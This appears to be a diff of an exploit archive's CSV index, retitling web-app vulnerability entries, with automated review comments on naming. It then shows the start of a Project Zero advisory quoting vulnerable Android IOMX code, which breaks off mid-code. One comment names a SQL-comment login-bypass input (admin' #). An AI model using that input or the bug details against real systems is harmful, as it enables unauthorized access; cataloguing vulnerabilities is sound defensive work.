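Review bot: the retitled 18208 adds a version ("Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)") that the previous title did not carry, while the companion entry 18198 lists "2.5.0 / 2.7.1". New version information in a title should be checked against the Metasploit module's target list before it is committed; if the module covers both versions the title should say so. Separately, the context line for 18215 reads "Local File Inclusion Injection", which looks like a leftover word and is worth a follow-up fix.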
@ -27943,7 +27952,6 @@ id,file,description,date,author,platform,type,port
26107,platforms/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - dispbbs.asp page Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0
26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - dispuser.asp name Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0
26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - boardhelp.asp Multiple Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0
26110,platforms/php/webapps/26110.txt,"Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting",2005-08-08,rgod,php,webapps,0
26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps,0
26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0
26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0
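Review bot: the header count drops from 7 to 6 and 26110 ("Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting") has no retitled counterpart, so it is the entry being removed. Nothing in the visible hunk explains why; a removal of an index row should be paired with the removal (or redirect) of platforms/php/webapps/26110.txt and a one-line reason in the commit message, so the gap in the id sequence is understood later.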
@ -29101,7 +29109,7 @@ id,file,description,date,author,platform,type,port
27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - Slideshow.php name Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0
27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - detail.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0
27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0
27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - Connect.INC Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0
27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0
27622,platforms/php/webapps/27622.txt,"Dokeos 1.x - viewtopic.php SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0
27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - Jahr Parameter Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0
27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - Include.php SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0
@ -29284,8 +29292,7 @@ id,file,description,date,author,platform,type,port
27846,platforms/asp/webapps/27846.txt,"EImagePro - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0
27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0
27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0
27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - 'Results.cfm' SQL Injection",2006-04-25,r0t,cfm,webapps,0
27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0
27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0
27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0
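Review bot: this hunk replaces two rows (27853 Results.cfm "category" and 27854 Details.cfm "ProdID") with a single row for 27853, so 27854 disappears from the index and the retitled 27853 no longer names the parameter. If the two advisories were merged, the surviving title should reflect both files, for instance "Cartweaver 2.16.11 - 'Results.cfm' / 'Details.cfm' SQL Injection"; if 27854 is simply a duplicate, its .txt file should go in the same commit.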
@ -29626,11 +29633,11 @@ id,file,description,date,author,platform,type,port
28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0
28403,platforms/php/webapps/28403.txt,"Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
28404,platforms/php/webapps/28404.txt,"Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0
28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
28410,platforms/php/webapps/28410.txt,"Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0
28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0
28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0
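Review bot: the retitle of 28410 from 'com_admin-copy_module' to "Display MOSBot Manager" is a substantive rename rather than a quoting change, unlike the other rows in this hunk, and cannot be verified from the diff alone; the commit message should cite where the product name was taken from. The context row 40378 also carries a mis-encoded author name ("Jakub A>>oczek"), which looks like a UTF-8 string read in the wrong encoding and deserves its own fix.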
@ -29652,7 +29659,7 @@ id,file,description,date,author,platform,type,port
28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0
28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0
28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0
28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0
@ -31506,15 +31513,15 @@ id,file,description,date,author,platform,type,port
31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0
31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0
31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0
31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0
31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0
32241,platforms/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0
32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,php,webapps,0
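Review bot: the hunk applies two different conventions to the same kind of entry: 31208, 31213 and 31216 only lose the quotes around the component name (com_sg, com_salesrep, com_scheduling), 31215 is renamed to the product name "Filebase", and 31206, 31207 and 31214 keep the quoted 'com_...' form untouched. Pick one form for Joomla!/Mambo component rows (the product-name form used elsewhere in this patch, e.g. "Material Suche", "AkoGallery") and apply it to all of them in this hunk.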
@ -31524,7 +31531,7 @@ id,file,description,date,author,platform,type,port
32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0
32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0
31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0
31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0
31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
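Review bot: 31224 is changed from 'com_profile' to com_profile while the adjacent 31226 keeps 'com_detail' in quotes; the same inconsistency as in the previous hunk, so either both rows should be retitled or neither.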
@ -31668,7 +31675,7 @@ id,file,description,date,author,platform,type,port
31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0
31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0
31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0
31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
@ -32415,8 +32422,8 @@ id,file,description,date,author,platform,type,port
32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080
32622,platforms/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80
32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0
32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0
32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0
32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0
32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0
32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0
32627,platforms/php/webapps/32627.txt,"ASP Forum Script - new_message.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0
32628,platforms/asp/webapps/32628.txt,"ASP Forum Script - messages.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0
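Review bot: the retitled 32624 ("PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection") drops the affected script (siteadmin/forgot.php) while 32625 keeps the file name but drops the parameters; elsewhere in this patch both are kept ("PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection" style with a parameter where known), so "'forgot.php' adname Parameter" would preserve the information. The context row 32627 is also filed under platforms/php/webapps with platform php although the entry is an .asp script of "ASP Forum Script", whose sibling rows 32626 and 32628 are under asp; worth a follow-up.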
@ -32522,7 +32529,7 @@ id,file,description,date,author,platform,type,port
32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' Parameter SQL Injection",2008-10-01,r45c4l,php,webapps,0
32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0
32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0
32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0
32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0
32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login['Username'] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32809,platforms/php/webapps/32809.txt,"Magento 1.2 - app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0
@ -32838,7 +32845,7 @@ id,file,description,date,author,platform,type,port
33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0
33447,platforms/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0
33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0
33449,platforms/php/webapps/33449.txt,"Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0
33449,platforms/php/webapps/33449.txt,"PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0
33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass",2009-12-31,indoushka,php,webapps,0
33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 - 'recent.php' Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0
33452,platforms/php/webapps/33452.txt,"Imagevue r16 - 'amount' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0
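Review bot: 33449 loses its vendor prefix ("Conkurent PHPMyCart 1.3" becomes "PHPMyCart 1.3") while 12372 in this same patch gains one ("AskMe Pro 2.1" becomes "Alstrasoft AskMe Pro 2.1"); the batch should decide whether vendor names belong in titles and apply that rule in both directions.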
@ -34225,7 +34232,7 @@ id,file,description,date,author,platform,type,port
35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0
35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0
35752,platforms/php/webapps/35752.txt,"Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0
35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0
35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0
@ -34428,16 +34435,16 @@ id,file,description,date,author,platform,type,port
36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,php,webapps,0
36095,platforms/php/webapps/36095.txt,"S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0
36096,platforms/php/webapps/36096.txt,"Web Professional - 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0
36097,platforms/php/webapps/36097.txt,"Mambo Component 'com_n-skyrslur' - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0
36097,platforms/php/webapps/36097.txt,"Mambo Component N-Skyrslur - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0
36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80
36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80
36102,platforms/php/webapps/36102.txt,"Mambo Component 'com_n-gallery' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36102,platforms/php/webapps/36102.txt,"Mambo Component N-Gallery - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36103,platforms/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo Component 'com_n-press' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo Component N-Press - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0
36108,platforms/php/webapps/36108.txt,"Mambo Component 'com_n-frettir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36109,platforms/php/webapps/36109.txt,"Mambo Component 'com_n-myndir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36108,platforms/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36109,platforms/php/webapps/36109.txt,"Mambo Component N-Myndir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0
36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0
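Review bot: the five Mambo renames in this hunk (36097, 36102, 36106, 36108, 36109) replace the exact component slug ('com_n-skyrslur', 'com_n-gallery', 'com_n-press', 'com_n-frettir', 'com_n-myndir') with a display name; since the slug is the identifier an administrator would grep a site for, keep it alongside the display name, e.g. "Mambo Component N-Gallery (com_n-gallery) - SQL Injection". Also within the hunk, 36098 and 36099 spell the product 'Guppy' and 'GuppY' and give the version range as '5.0.9 / 5.00.10' versus '5.0.9 < 5.00.10'; pick one form for both rows.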
@ -35802,7 +35809,7 @@ id,file,description,date,author,platform,type,port
38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0
38309,platforms/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0
38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0
38312,platforms/php/webapps/38312.txt,"AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0
40882,platforms/php/webapps/40882.txt,"Edge SkateShop - Authentication bypass",2016-12-06,Delilah,php,webapps,0
38314,platforms/php/webapps/38314.txt,"WordPress Plugin NextGEN Gallery - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0
38315,platforms/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0
38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,cgi,webapps,0
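Review bot: this hunk swaps one existing row for 40882 (7 lines in, 7 out) but places the new 2016 entry between 38312 and 38314 instead of with the other 408xx rows at the tail of the file, and its description uses lower-case 'Authentication bypass' where the rest of the index uses title case ('Authentication Bypass' in 36098). Move the row to the end of the file and capitalise it; the 40882.txt file later in this diff also shows the bypass is driven by a SQL comment sequence in the username field (admin' #), which the description should name so the index reflects the actual weakness.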
@ -36850,3 +36857,4 @@ id,file,description,date,author,platform,type,port
40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0
40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0
40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0
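Review bot: the description 'AbanteCart 1.2.7 - Cross-Site Scripting' is less specific than the file it indexes, whose own title (40877.txt, 'AbanteCart 1.2.7 Stored XSS') says the issue is persistent; use 'Persistent Cross-Site Scripting' as 38316 already does, so the stored/reflected distinction survives in the index.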


platforms/android/dos/40876.txt Executable file

@ -0,0 +1,169 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=932
The code in IOMXNodeInstance.cpp that handles enableNativeBuffers uses port_index without validation, leading to writing the dword value 0 or 1 at an attacker controlled offset from the IOMXNodeInstance structure.
The vulnerable code is here (every write to mSecureBufferType):
status_t OMXNodeInstance::enableNativeBuffers(
OMX_U32 portIndex, OMX_BOOL graphic, OMX_BOOL enable) {
Mutex::Autolock autoLock(mLock);
CLOG_CONFIG(enableNativeBuffers, "%s:%u%s, %d", portString(portIndex), portIndex,
graphic ? ", graphic" : "", enable);
OMX_STRING name = const_cast<OMX_STRING>(
graphic ? "OMX.google.android.index.enableAndroidNativeBuffers"
: "OMX.google.android.index.allocateNativeHandle");
OMX_INDEXTYPE index;
OMX_ERRORTYPE err = OMX_GetExtensionIndex(mHandle, name, &index);
if (err == OMX_ErrorNone) {
EnableAndroidNativeBuffersParams params;
InitOMXParams(&params);
params.nPortIndex = portIndex;
params.enable = enable;
err = OMX_SetParameter(mHandle, index, &params);
CLOG_IF_ERROR(setParameter, err, "%s(%#x): %s:%u en=%d", name, index,
portString(portIndex), portIndex, enable);
if (!graphic) {
if (err == OMX_ErrorNone) {
mSecureBufferType[portIndex] =
enable ? kSecureBufferTypeNativeHandle : kSecureBufferTypeOpaque;
} else if (mSecureBufferType[portIndex] == kSecureBufferTypeUnknown) {
mSecureBufferType[portIndex] = kSecureBufferTypeOpaque;
}
}
} else {
CLOG_ERROR_IF(enable, getExtensionIndex, err, "%s", name);
if (!graphic) {
// Extension not supported, check for manual override with system property
// This is a temporary workaround until partners support the OMX extension
char value[PROPERTY_VALUE_MAX];
if (property_get("media.mediadrmservice.enable", value, NULL)
&& (!strcmp("1", value) || !strcasecmp("true", value))) {
CLOG_CONFIG(enableNativeBuffers, "system property override: using native-handles");
mSecureBufferType[portIndex] = kSecureBufferTypeNativeHandle;
} else if (mSecureBufferType[portIndex] == kSecureBufferTypeUnknown) {
mSecureBufferType[portIndex] = kSecureBufferTypeOpaque;
}
err = OMX_ErrorNone;
}
}
return StatusFromOMXError(err);
}
This code is reached from the binder interface android.hardware.IOMX in the mediaserver process; via the following code in IOMX.cpp which reads the port_index directly from the incoming parcel without any validation.
case ENABLE_NATIVE_BUFFERS:
{
CHECK_OMX_INTERFACE(IOMX, data, reply);
